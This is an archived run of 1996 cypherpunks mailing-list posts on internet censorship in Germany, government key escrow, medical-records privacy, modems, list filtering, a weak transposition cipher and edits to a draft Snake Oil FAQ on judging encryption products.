You need DNA to grow bacteria. > You can get the DNA two ways. (A) You get a sample of the beast, or (B) > You get a DNA sequence and then regenerate the DNA. (I don't think B is > technically feasable yet.) (2) You can't send samples of the beast thru > the net. I think your point was that the net was not responsible for the proliferation of Anthrax development data. (Am I wrong?) My point was that in the eyes of the "leaders" all that is required to make the net responsible for the proliferation is for the process to be describeable in a simple one or two page set of instructions (such as Anthrax is). > ------------------------------------------------------------------------- > Bill Frantz | "Cave softly, cave safely, | Periwinkle -- Consulting > (408)356-8506 | and cave with duct tape." | 16345 Englewood Ave. > frantz at netcom.com | - Marianne Russo | Los Gatos, CA 95032, USA -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From alexlh at yourchoice.nl Wed Sep 18 16:08:47 1996 From: alexlh at yourchoice.nl (Alex Le Heux) Date: Thu, 19 Sep 1996 07:08:47 +0800 Subject: (fwd) Global Alert: GERMAN GOVERNMENT PUSHES BLOCKAGE OF NETHERLANDS WEB SITE Message-ID: <199609181746.TAA13590@sarah> Path: xs4all!felipe From: felipe at xs4all.nl () Newsgroups: xs4all.announce Subject: Global Alert: GERMAN GOVERNMENT PUSHES BLOCKAGE OF NETHERLANDS WEB SITE Date: 18 Sep 1996 17:28:31 GMT Organization: XS4ALL, networking for the masses Lines: 118 Approved: the boss Message-ID: <51pbfv$anu at news.xs4all.nl> NNTP-Posting-Host: xs1.xs4all.nl X-XS4ALL-Date: Wed, 18 Sep 1996 19:28:31 MET DST X-Newsreader: NN version 6.5.0 #4 *** GLOBAL ALERT *** FOR IMMEDIATE RELEASE SEPT. 18, 1996 - Please redistribute this document widely with this banner intact - Redistribute only in appropriate places & only until 15 October 1996 GERMAN GOVERNMENT PUSHES BLOCKAGE OF NETHERLANDS WEB SITES. At the behest of, and in response to legal threats from, the German government, internet providers in Germany have blocked the Dutch Web site Access For All (www.xs4all.nl), removing German users' access to the entire xs4all system. The German government demanded this action because xs4all hosts a Web "home page" with so-called left-wing political content that, though fully legal in the Netherlands, is allegedly illegal in Germany. (see: http://www.anwalt.de/ictf/p960901e.htm). As a result of this action, *all* xs4all web sites, including several thousand that have nothing to do with the offending home page, are unavailable to readers in Germany. Please send a letter of protest to the German ambassador in your country, ask your foreign minister to protest officially to the German government, and distribute this alert as widely as possible online and to the press. Referring to article 19(2) of the International Covenant on Civil and Political rights, which Germany ratified in 1973, we, the undersigned organizations, consider this censorship an illegal act. Additionally, the value of attempting to ban content the German government finds offensive is highly questionable. The proper response to offensive expression is more and better expression, and prosecution of offending criminals, not censorship. As a result of the overly broad censorship measure which targets an entire Internet access provider instead of a specific user, all 3000 and more Web site hosted by xs4all are virtually inaccessible in Germany. The loss of clients who market in Germany has resulted in economic damage to xs4all. The immeasurable harm of censoring thousands of other users for the speech of one is even greater. Access for All, though it has expressed willingness to assist the Dutch police in identifying online criminals abusing the xs4all system, has a policy against censoring its clients. Mirroring this position, at least one German Net provider has responded to the government demands with skepticism, pointing out that their compliance with the censorship request may cause them to violate contracts with their own German users, and that the government's liability threats are tantamount to holding a phone company liable for what users say on the telephone. Instead of the futile act of censorship that has simply drawn increased attention to the offending material and resulted in its widespread availability on other sites throughout the world, the German government should have acted through legal channels and asked the authorities in the Netherlands to cooperate in determining what legal action, if any, was appropriate. We are concerned that German internet providers have cooperated so easily with government censorship efforts. Some level of cooperation was probably assured by underhanded and rather questionable police threats of system operator liability for user content, but we must urge more resistance on that part of Net access providers to such online censorship schemes. As with libraries, there are many who would censor, but there is a responsibility on the part of providers of access to information, to work to protect that access, else libraries, and Internet service providers, lose the reason for their existence. We ask that the German government refrain from further restrictive measures and intimidation of internet providers and recognize the free, democratic, world wide communications represented by the Internet. All governments should recognize that the Internet is not a local, or even national, medium, but a global medium in which regional laws have little useful effect. "Top-down" censorship efforts not only fail to prevent the distribution of material to users in the local jurisdiction (material attacked in this manner can simply be relocated to any other country), but constitutes a direct assault on the rights and other interests of Internet users and service providers in other jurisdictions, not subject to the censorship law in question. For press contacts, and for more information about the Internet, see the homepages for the signatories to this message: DB-NL (Digital Citizens Foundation in the Netherlands) * http://www.xs4all.nl/~db.nl ALCEI - Electronic Frontiers Italy * http://www.nexus.it/alcei CITADEL-E F France *http://www.imaginet.fr/~mose/citadel CommUnity (UK) * http://www.community.org.uk Electronic Frontier Canada * http://www.efc.ca/ Electronic Frontier Foundation (USA) * http://www.eff.org Electronic Frontiers Australia * http://www.efa.org.au/ Other signatures: NLIP, Dutch Foundation for Internet Providers * http://www.nlip.nl Internet Providers Rotterdam * http://www.ipr.nl Digitaal Werknet Nederland * http://www.dwn.nl Foebud e.V, foundation to promote free datatraffic, * http://www.zerberus.de National Writers Union (UAW LOCAL 1981 AFL-CIO) * http://www.nwu.org/nwu/ Nizkor Project * http://www.nizkor.org/ Internet Access Foundation (NL) * http://www.iaf.nl/ Digitale Stad Venlo * http://www.dsvenlo.nl CSO * http://www.canucksoup.net/ -- Felipe Rodriquez - XS4ALL Internet - finger felipe at xs4all.nl for http://xs4all.nl/~felipe/ - Managing Director - pub pgp-key 1024/A07C02F9 pgp Key fingerprint = 32 36 C3 D9 02 42 79 C6 D1 9F 63 EB A7 30 8B 1A -- /// I dabble in techno-house and sometimes, /// I do that badass hip-hop thang... /// But the F U N K gets me every time! From thumbnail at nym.alias.net Wed Sep 18 16:37:55 1996 From: thumbnail at nym.alias.net (Thumbnail) Date: Thu, 19 Sep 1996 07:37:55 +0800 Subject: FCC Licensed Cypherpunks Message-ID: <199609181800.OAA21782@anon.lcs.mit.edu> -----BEGIN PGP SIGNED MESSAGE----- As someone pointed out recently, there's a lot of similarity between the as-yet-unregulated Internet and the pre-FCC airwaves. There were even cypherpunk-analogs back then, who called themselves amateur radio operators. Where are they now? Corralled into tiny slices of FCC-approved bandwidth. Granted titles of nobility by the government in recognition of their Morse code prowess. Eager to report pirate operators who don't play by the rules, at least back when the FCC still investigated such complaints. There lies the future: all those newbies wandering in with their "Unbrakable Random Number Generator Encription Systemz" are going to come back as Master Class Amateur Cryptography Operators, and by God you'd better not laugh at their Internet Key Recovery Authority certificates, if you know what's good for you. Have a nice day. - --Thumbnail ~~~ The PGP signature on this message is to certify that it was sent by thumbnail at nym.alias.net on or before Wed Sep 18 18:00:48 1996 GMT. The administrators of nym.alias.net and the nym.alias.net PGP key in no way endorse, approve of, or claim authorship of this message. Report any abuse of this pseudonym service to admin at nym.alias.net. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMkA40U5NDhYLYPHNAQGKZAf+ImZZXEAXdWdv1v30GFfguJ+1KWJRMsDD uhDjuwyHfFVvKpJSyYr5nmBJLm41vvSXOIJnCtjzS7Ai+Y9tEnMUsY5Mg0Qp76LB qvxDIgSB+S87xjSzWAx9Kur0SqRkyu3UZPqBniSKzUWIf9/dzu2ttnC0d+eCoBHZ Vk8z8h6JsSU3G35djG7jrvVv4+Jg7VSIjFHvvfaJ528vcM+iUxiLWidIz1PPKmN4 r3dnjCsJql9akc2U013pFXzQV890bc2VEha5NQwxCPYS9L1oCZJfc5as5c6t0Xb7 AwoaZEhCt352TBQdeoLSE+5t+l3YvDSnmPr/HUWI+/bk27/XGhugTA== =hmdh -----END PGP SIGNATURE----- From liberty at gate.net Wed Sep 18 16:47:27 1996 From: liberty at gate.net (Jim Ray) Date: Thu, 19 Sep 1996 07:47:27 +0800 Subject: The GAK Momentum is Building... Message-ID: <199609181600.MAA109012@osceola.gate.net> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: shamrock at netcom.com, liberty at gate.net, cypherpunks at toad.com Date: Wed Sep 18 11:57:32 1996 Lucky wrote: > On Wed, 18 Sep 1996, Jim Ray wrote: [my stuff about a small "victory" elided.] > Nope. It is a Cypherpunk loss. The use of the term "key recovery" for GAK > now fully obfuscates the distinction between accessing a > backup copy by the legitimate owner (or his estate, employer, etc.) and > GAK. Many PKIs will support the former type of key recovery. And for good > reasons. Thanks to the brainwashers using the same term for GAK, it will > now become impossible to tell from a basic description of a PKI if it > supports GAK or not. Furthermore, those who oppose the latter type of key > recovery (us!), will be pushed further into the fringe by the media > now being able to mix up our arguments against GAK with arguing against > true key recovery. [Do you notice the weird constructs I have to use to > distinguish the two meanings? One of them being new...] Upon further reflection, I agree with Lucky. I will say that the _really_ bad news is that our opponents seem to be getting smarter. Or else I'm just getting dumber. :( Also: If any more of you have comments for Judge Kozinski, please send them to me soon. Comments from stable nyms (such as you, Lucky) are especially appreciated, and with your permission I will include this message. Please tell me if you want me to include your e-mail address in the message to Judge Kozinski. TIA. JMR Regards, Jim Ray -- DNRC Minister of Encryption Advocacy "As govt.s grow arithmetically, corruption grows exponentially." -- Ray's Law of official corruption. Defeat the Duopoly! Stop the Browne out. Harry Browne for President. Jo Jorgensen for Vice-president. http://www.HarryBrowne96.org/ http://www.twr.com/stbo ___________________________________________________________________ PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 I will generate a new (and bigger) PGP key-pair on election night. http://www.shopmiami.com/prs/jimray ___________________________________________________________________ -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMkAb8m1lp8bpvW01AQGwDQP/Wz8Bw27oXVzNt4gusljym5ardHFgCNDR A3N8kXcL7rGRs2SFDBNYlodcTSh60d1FJTvLQ77oolMPWp3oQygZ+HLFEhwHK/GG tt1VPavPhvpdPiXoDOcZKUm/vRobAJrvkfUEaeqI8hmzCVBq5YS/4m4KaD3XquWO w0IyCViMVmw= =ntqD -----END PGP SIGNATURE----- From tcmay at got.net Wed Sep 18 16:53:28 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 19 Sep 1996 07:53:28 +0800 Subject: GAK, GAP, GAY Message-ID: GAK -- Government Access to Keys GAP -- Government Access to Patients GAY -- Government Access to You At 3:03 PM 9/18/96, Lucky Green wrote: >On Wed, 18 Sep 1996, Jim Ray wrote: >> I agree, and hope so. "Key Recovery," while not as Orwellian-sounding as >> "GAK," is a step on the path to honesty WRT the English language, though >> it's important to continually point out, as Tim did in his post, that >> *access* -- rather than just recovery -- is obviously what Mr. Freeh wants. >> >> I'd count this likely change in terminology as a "cypherpunk victory," >> albeit a very small and certainly a very hard-fought one. > >Nope. It is a Cypherpunk loss. The use of the term "key recovery" for GAK >now fully obfuscates the distinction between accessing a >backup copy by the legitimate owner (or his estate, employer, etc.) and >GAK. Many PKIs will support the former type of key recovery. And for good >reasons. Thanks to the brainwashers using the same term for GAK, it will >now become impossible to tell from a basic description of a PKI if it >supports GAK or not. Furthermore, those who oppose the latter type of key Further, merely _asking_ your Designated Key Recovery Authority what its release policies are will of course place your name on the SPL (Suspicious Persons List). The FAA is an agency which will have nearly unlimited access to communications, under the Safe Skies and Anti-Child-Hurting Act. (Think about it--Clinton already signed a couple of Presidential Decision Directives and Congress passed various anti-terrorism acts which already give the Feds authority to wiretap and surveil more widely than before, at least legally. The Foreign Intelligence Surveillance Act (or court) allows widespread surveillance of suspected foreign agents, without any notification of local courts or of the surveillance target. Won't these many provisions allowing wide surveillance already be used almost instantaneously to force PKIs to disclose keys of all those on the SPL? "If it saves just one child.") On a related note, I read an article yesterday about the proposed new Health Data Base, with all encounters with any medical institution or any health care provider of any sort being cross-linked and cross-referenced. The privacy concerns are supposedly handled by having "security tickets" for various hospital officials, researchers (!!), insurance companies, and law enforcement. (I put the "!!" next to the "researchers" because I don't recall releasing my medical and dietary history to any so-called "researchers." While I have no doubt that many "data miners" would like access to such national data bases, and that some potentially valuable information could be gleaned, I didn't release this information for Joe Gradstudent, Ph.D. candidate to sift through.) [Here are some more details: "Mission: one-stop medical records," Robert S. Boyd, San Jose Mercury News, 1996-09-17, p. 1. "Virtually unnoticed by the public, health-care experts are preparing to create an electronic "Master Patient Index," covering every American's medical records from cradle to grave...."We can't eliminate privacy concerns, but we can minimize them," said Richard Rubin, president of the Foundation for Health Care Quality in Seattle at a planning conference here last week....David Kilman, a computer expert at New Mexico's Los Alamos National Laboratory, where the idea for the master index was born....Only people with a 'security ticket'--such as doctors, insurers, scientific researchers or police with a proper warrant--are supposed to be able to see the clinical details....Kathy Ganz, director of the New Mexico Health Policy Commission, said, "Rights to privacy are genuine concerns, but they will need to be balanced against notions of common good.""] Pretty chilling, eh? As we all know, once such medical, dietary, and genetic data bases are established, the likelihood of privacy-invading use is near unity. If the NLETS data base can be routinely accessed (it's how I got Thomas Pynchon's home address, but that's another story), imagine who will hack this data base! The tabloids will love it, as they gain access to "medical records of the stars." Hackers will suck down as much as they can and then sell the records. And such data bases will be tied to True Names, of course, thus allowing the "freezing out" of anyone who is not a True Name, who has fallen behind in child support payments, who is late on his income taxes, and so on. It doesn't matter if cash is still allowed if one cannot interact with any health care person without a proper citizen-unit data base entry. They've got you tracked even if you pay in gold dust. (Putting on my Duncan cap--not to be confused with dunce cap--I wonder what will happen the first time someone dies because a hospital wouldn't treat someone without a proper citizen-unit health care card?) P.S. I fully understand that some doctors will treat patients for cash, without reporting to The Authorities, just as some doctors will treat gunshot wounds without the mandatory reporting of same to the police. This does not mean such doctors will be easy to find. The System, if allowed to win, will win. P.P.S. Many of the things we talk about on the list are being made possible--the good and the bad--by computerization. Obviously. Burnham's "Age of Privacy" (or maybe it was "The Age of Surveillance"--my copy is not handy) made this point many years ago. We are taking the mechanization and systematization procedures the Germans used so efficiently in the 1930s and modernizing them, with every movement and every transactions tracked and recorded in data bases. Now more than ever we need "credentials without identity" and digital cash. Chaum's article about "Transaction Systems to Make Big Brother Obsolete" is now more urgent than ever. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From Adamsc at io-online.com Wed Sep 18 16:55:00 1996 From: Adamsc at io-online.com (Adamsc) Date: Thu, 19 Sep 1996 07:55:00 +0800 Subject: 56 kbps modems Message-ID: <19960918160153703.AAH88@IO-ONLINE.COM> On Mon, 16 Sep 1996 12:16:08 +0200, Gary Howland wrote: >craigw at dg.ce.com.au wrote: >> well here in Australia Telstra our national carrier only "garantees" >> 2400 baud to work. >As I am sure has been discussed at length before, baud does not equal >bps. AFAIK, V32bis is only 2400baud. This is correct. The difference is in the number of values for each of the 2400 signals sent per second. # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." -- Duncan Frissell From tcmay at got.net Wed Sep 18 17:05:25 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 19 Sep 1996 08:05:25 +0800 Subject: Mercenaries Message-ID: At 9:40 PM 9/17/96, William Knowles wrote: >On Tue, 17 Sep 1996, Michelle Thompson wrote: > >> Interesting information from a friend of mine- >> >> >An american can not serve for pay for a position in another military >> >that could be filled by local populace. I may have my jurisdiction >> >wrong tho, this could be an international law not a US law. >> >Basically, you can't go be a grunt or an assasin in another country, >> >because they can find their own, As to Michelle's point that Americans cannot serve for pay in other militaries, there are all sorts of waivers and "look the other way"s involved. For example, the retired American officer who became the top military man in Estonia (or one of the Baltic States)--while still retaining his U.S. citizenship. >What about the French Foreign Legion? or the Volunteers for Israel, >which isn't really a fighting force, but Americans can help keep >the Israeli army at a ready state. Israel is one of several states which the U.S. allows dual citizenship with. For political reasons, because of America's extermination of the Jews in WW II (Whoops, we were on the other side...so why do we have such a cozy deal with Israel, but not with, say, France? Beats me. Politics.) Brian Davis, our former Prosecutor, can tell us how likely it is that any person would be charged and brought to trial for being a paid mercenary for some small country in the Third World. The CIA is often behind such mercenaries, so national security issues could make the issue murky. But the real reason such prosecutions are rare is that the government realizes how Orwellian it sounds to say: "You are being prosecuted because you were a mercenary for Oceania in its war with Eastasia. While Oceania was once our ally in our battle with Eastasia, and we endorsed and financed your role as a mercenary, we became allies with our great friend Eastasia and are now in a state of war with the tyrants of Oceania." >Explicit isn't a dirty word, Or is it? AOL has declared "explicit" to be a Banned Word, along with "pissant," "craps," and "cock," and numerous other such ordinary words. (So much for mentioning their pissant policies, a game of craps in Las Vegas, or a male chicken.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From perry at piermont.com Wed Sep 18 17:09:34 1996 From: perry at piermont.com (Perry E. Metzger) Date: Thu, 19 Sep 1996 08:09:34 +0800 Subject: a simple cypher scheme In-Reply-To: <9609180005.AA14720@ns.tsinet.com> Message-ID: <199609181641.MAA14118@jekyll.piermont.com> stuart johnson writes: > a co-worker here has > come up with a 'cypher' scheme that he would like to use to send code to our > clients. the scheme is this : he would take the file of code and pad all > lines to the length of the longest line, he would then preform column swaps, > and then row swaps, to 'mix up' the file. the person receiving the file > would then preform the opposite functions to recover the file. it seems so > simple that it can't be good. i've convenced him to use pgp, but i would > like some input if possible on why his cypher scheme is not a good one. This is a variant on a scheme called a transposition cipher. It was okay, but not very good, technology in the Civil War, when it was last seriously used. It can be broken with a technique called multiple anagramming. Perry From Adamsc at io-online.com Wed Sep 18 17:14:48 1996 From: Adamsc at io-online.com (Adamsc) Date: Thu, 19 Sep 1996 08:14:48 +0800 Subject: 56 kbps modems Message-ID: <19960918160153703.AAG88@IO-ONLINE.COM> On Sun, 15 Sep 1996 23:35:38 -0700 (PDT), Lucky Green wrote: >Seriously, how may of the 28.8 modem users get connections at 28.8? >Twenty percent? Fifty percent? Today's modems are already faster than >most analog lines can support. More likely than not, a 56k modem won't >link up at 56k. If you want speed, use the clean solution. Get ISDN. >[And don't buy the Motorola BitSurfer PRO. It won't work with two line >phones. The sound is so bad, you can't use the POTS you pull out for >business. Motorola: "We are aware of the problem". Well, they have been >aware of it since at least February.] Interesting. . . Oh well, I bet their competition doesn't mind. >But for data, home ISDN is the way to go. Of course, we'll be getting the cable modems around here by early next year, so I might just wait for that 15MB/s. . . # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." -- Duncan Frissell From Adamsc at io-online.com Wed Sep 18 17:20:14 1996 From: Adamsc at io-online.com (Adamsc) Date: Thu, 19 Sep 1996 08:20:14 +0800 Subject: Workers Paradise. /Political rant. Message-ID: <19960918160153703.AAF88@IO-ONLINE.COM> On Mon, 16 Sep 1996 07:37:17 +0200 (MET DST), Anonymous wrote: >> The thing about _traditional_ charity, of the religious or community sort, >> was that it was not treated as an "entitlement," as something the resentful >> masses could "demand" as part of their "human rights." > There's no substantial difference between their resentful whining about >their rights and your resentful whining about your rights - except maybe >that you whine more. Last time I checked, tcmay has never insisted that it is his right to have something I worked for. . . # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." -- Duncan Frissell From Adamsc at io-online.com Wed Sep 18 17:33:36 1996 From: Adamsc at io-online.com (Adamsc) Date: Thu, 19 Sep 1996 08:33:36 +0800 Subject: Workers Paradise. /Political rant. Message-ID: <19960918160153703.AAD88@IO-ONLINE.COM> On Sun, 15 Sep 96 23:43:33 +0000, attila wrote: > forget the idea that it will build a community --unless > you wish to consider the Bitch's "It Takes a Global > Village" a community. Statist from the cradle; welcome She's right about that, to some extent. It often does take a village to raise a child. What she doesn't mention is that the governmental policies she lobbies for are doing their best to destroy that village. Name one example where wealth-transfers have made people more willing to spread their now vastly reduced resources to the needy? As a sidenote, does anyone know how much of the money taken out in taxes actually goes toward useful things? i.e. maintaining infrastructure like roads, providing for the public defense, paying police (most of whom I've found are great people. It's the higherups who seem to have ODed something), forest service, etc? # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." -- Duncan Frissell From Adamsc at io-online.com Wed Sep 18 17:36:37 1996 From: Adamsc at io-online.com (Adamsc) Date: Thu, 19 Sep 1996 08:36:37 +0800 Subject: Workers Paradise. /Political rant. Message-ID: <19960918160153703.AAE88@IO-ONLINE.COM> On Sun, 15 Sep 1996 17:13:53 -0700, Dale Thorn wrote: >> And that's good. The world population really should go back to around >> 1 billion for achieving a stabile ecology (with singing birds for >> the peace of minds). The former (?) US system of encouraging young >> standalone women to make babies to get benefits was very bad. The >> Chinese system - less benefits the more children you have - is the >> way to go. >Just a comment: "The world population really should go back to around >one billion", etc. And how could we achieve that without severe govt. >oppression, one wonders? Now, I've heard of "education" being used to >help the masses learn to be responsible citizens ad nauseam, but since >education is pretty much just propaganda in the massively-capitalist >system now taking over even the P.R. of China, how the heck is education >going to work? Well, they're much better at telling kids how to use condoms than they are at, say, explaining an integral. (or even an equation for that matter) As a side note, how about some real welfare reform: mandatory birth control (and pay for that; it's *much* cheaper) and benefits go DOWN for additional births. # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." -- Duncan Frissell From hallam at vesuvius.ai.mit.edu Wed Sep 18 17:43:24 1996 From: hallam at vesuvius.ai.mit.edu (hallam at vesuvius.ai.mit.edu) Date: Thu, 19 Sep 1996 08:43:24 +0800 Subject: Spam blacklist project In-Reply-To: Message-ID: <9609182121.AA13495@vesuvius.ai.mit.edu> Not impressed by their setup, there does not seem to be any checking to see if the mail address is correct (ie to checlk for a denial of service attack) and the setup requires distributors to submit their list for "washing". That type of setup may be OK for the bush league but its hardly cypherpunk type stuff. Its fairly easy to set up a scheme in which the blacklist can be distributed with no risk to the subscribers. Simply use a SHA digests and so on. I hadn't checked on Yahoo, I tend to use Alta-Vista having found Yahoo somewhat arbitary in category definition. Phill PS Sites that use red text on a white background ... ugh!!! From ericm at lne.com Wed Sep 18 17:47:46 1996 From: ericm at lne.com (Eric Murray) Date: Thu, 19 Sep 1996 08:47:46 +0800 Subject: cypherpunk listserve usefulness In-Reply-To: Message-ID: <199609181601.JAA28161@slack.lne.com> Chip Mefford writes: > > > As much as it shames me, I have recently discovered that by filtering > messages from only 2 participants and setting body filters on 3 keywords > have remarkably improved the usefulness of this listserve. Out of curiosity, what are those keywords? > As much as I do enjoy some of the filtered subject matter, I really feel it > is very off subject and makes this listserver useless for the intended task. > > I guess that makes me a censor and it has me reexamining some things. No, filtering your mail does NOT make you a censor, unless you're filtering the mail before it is gatewayed to a list or newsgroup where other people read it. And they didn't ask you to do the filtering. Filtering your own mail is akin to choosing which articles in a magazine to read. It's not censorship if you don't read an article; it's the article's author's fault that he didn't make the article interesting enough for you to read. I think that anyone who has to work for a living must filter the cypherpunks list in order to cut out some of the crap. Most people just don't have the time to wade through everything, and filtering some of it out is a good start on upping the S/N ratio. What you consider Signal and Noise however is entirely up to you. -- Eric Murray ericm at lne.com ericm at motorcycle.com http://www.lne.com/ericm PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03 92 E8 AC E6 7E 27 29 AF From tcmay at got.net Wed Sep 18 18:03:17 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 19 Sep 1996 09:03:17 +0800 Subject: cypherpunk listserve usefulness Message-ID: At 2:33 PM 9/18/96, Chip Mefford wrote: >As much as it shames me, I have recently discovered that by filtering >messages from only 2 participants and setting body filters on 3 keywords >have remarkably improved the usefulness of this listserve. > >As much as I do enjoy some of the filtered subject matter, I really feel it >is very off subject and makes this listserver useless for the intended task. > >I guess that makes me a censor and it has me reexamining some things. No, it certainly does not make you a "censor." It makes you more _discriminating_, but this is often a good thing. A _censor_, by all standard definitions one can find, is one who restricts what _others_ may read. The form that concerns many of us the most is when a government uses its monopoly on force to censor. (But the term can also apply to when churches or corporations act as censors of what worshipper-units or employee-units may read or view.) I hope by "has me reexamining things" you do not mean that your experience with filters means support for government telling us all which filters we must use. Certainly the CP list is undergoing one of its periodic "sunspot cycles," where spambots and loonies are attempting to trash it, and where the discussions of meaty issues are being affected. We've survived half a dozen or so such periods, and will survive this. The best way to increase the S/N ratio is to post more signal. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From geeman at best.com Wed Sep 18 18:06:13 1996 From: geeman at best.com (geeman at best.com) Date: Thu, 19 Sep 1996 09:06:13 +0800 Subject: Snakeoil FAQ edits/comments Message-ID: <01BBA534.F29A46E0@geeman.vip.best.com> Matt: Thanks, and good work. My comments are indicated by [your text] in brackets, my comments >>> set off by >>>'s. To help separate, look for "-----------------------------" --------------------------- snake-oil-faq ---------------------------- Snake-Oil Warning Signs Encryption Software to Avoid $Id: snake-oil-faq.html,v 0.4 1996/09/16 13:52:26 cmcurtin Exp $ Distribution Please do not distribute this beyond the circles of cryptographic competence yet. This is an incomplete work-in-progress. Feedback is greatly appreciated. The Snake Oil FAQ is (to be) posted monthly to cypherpunks, sci.crypt, alt.security, comp.security, and comp.infosystems. We're targeting those who have influence over or direct involvement in the purchasing decisions of computer security software and equipment in the corporate and academic worlds, as well as individual users who wish to assert their privacy through the use of good cryptography. ----------------------------- >>> I wonder what a good assumption is about level-of-expertise. I should think rather low, since a more experienced person will not be in as much need of the doc in the first place. Think moderately-informed user: like the readers of InfoWorld, eh? Given that, there are several places where knowledge of the subject is assumed that the real consumer of the FAQ doesn't have. ----------------------------- Disclaimer All contributors' employers will no doubt disown any statements herein. We're not speaking for anyone but ourselves, based on our own experiences, etc., etc., etc. This is a general guideline, and as such, cannot be the sole metric by which a security product is rated, since there can be exceptions to any of these rules. ----------------------------- >>> Actually, I think there are some rules in here that there are no exceptions to. Check; nothing comes immediately to mind tho. ----------------------------- ----------------------------- [(But if you're looking at something that sounds familiar on several of the 'things to watch out for,' you're probably dealing with snake oil. ] >>> But if many of the items on the "Things to look out for" list seem to apply to a product, the product is very likely weak. ----------------------------- ----------------------------- >From time to time, a reputable and decent vendor will produce something that is actually quite good, but will use some [braindead] marketing technique, so be aware of exceptions. >>> "Braindead", eh, hmmmmm. Too dignified ;) ----------------------------- Every effort has been made to produce an accurate and useful document, but the information contained herein is completely without warranty. If you find any errors, or wish to otherwise contribute, please contact the document keeper, C Matthew Curtin Introduction Good cryptography is an excellent and necessary tool for almost anyone. However, there is a multitude of products around. Many good cryptographic products are available, both commercial (including shareware) and free. However, there are also some extremely bad cryptographic products (known in the field as "Snake Oil"), which not only fail do their job of providing security, but are based on, and add to, the many misconceptions and misunderstandings surrounding cryptography and security. ----------------------------- >>> They also prey on the inexperience of the consumer, rely on the mystery and mystique of mathmatical-sounding jargon, to make poorly engineered products seem to be something they are not. ----------------------------- Superficially, it is difficult for someone to distinguish the output of a secure encryption utility from snake oil: both look garbled. The purpose of this document is >>> to <<< present some obvious "red flags" [so that] >>> which <<< people unfamiliar with the nuts and bolts of cryptography can use as a guideline for determining whether they're dealing with snake oil or the Real Thing. For a variety of reasons, this document is general in scope and does not mention specific products or algorithms as being "good" or "Snake Oil". When evaluating any product, be sure to understand what your needs are. For data security products, what do you need protected? Do you want an archiver that [supports strong encryption? ] ----------------------------- >>> Problem: what is "Strong Encryption" ??? From a user's point of view this term is too fuzzy. Try: "that will keep data secure from your kid sister? A rogue government? For 5 minutes? Etc. etc. " ----------------------------- ----------------------------- [An E-mail client? Something that will encrypt on-line communications? Do you want to encrypt an entire disk or partition, or selectively some files? Do you need on-the-fly (automatic) encryption and decryption, or are you willing to select when and which files you want encrypted? ] >>> I'd leave that out: not pertinent to snake-oil vs. Good Stuff, but is about the kind of application user requires. How secure is "secure enough?" Does the data need to be unreadable by third parties for 5 minutes? One year? 50 years? 100 years? >>> see above. ----------------------------- ----------------------------- [Different products will serve different needs, and it's rare that a product will serve every need. (Sometimes a product won't be needed: it may be better to use a utility to encrypt files, transmit them over a network using standard file transfer tools, and decrypt them at the other end than to use a separate encrypted utility in some cases.)] >>> I don't understand: "sometimes a product won't be needed?" I think this paragraph could be left out. After all, OS utility or Snoop-Dooper-Doggy-Doo-Ware product, ya still gotta know what you're doing, right? So you everthing in the FAQ still applies; or maybe I'm missing the point here. ----------------------------- Some basics The cryptography-faq (found at ftp://rtfm.mit.edu/pub/usenet/cryptography-faq/) is a more general tutorial of cryptography, and should also be consulted. In an effort to make this FAQ more complete, some very basic topics are included below. Conventional vs. Public Key Cryptography ----------------------------- There are two basic types of cryptosystems: symmetric (also known as "conventional," [sometimes also called] >>> or <<< "private key") and asymmetric (public key). Symmetric ciphers require both the sender and the recipient to have the same key. That key is [applied] >>> used by the cryptographic algorithm <<< to encrypt the data >>> originated <<< by the sender, and again by the recipient to decrypt the data. Asymmetric 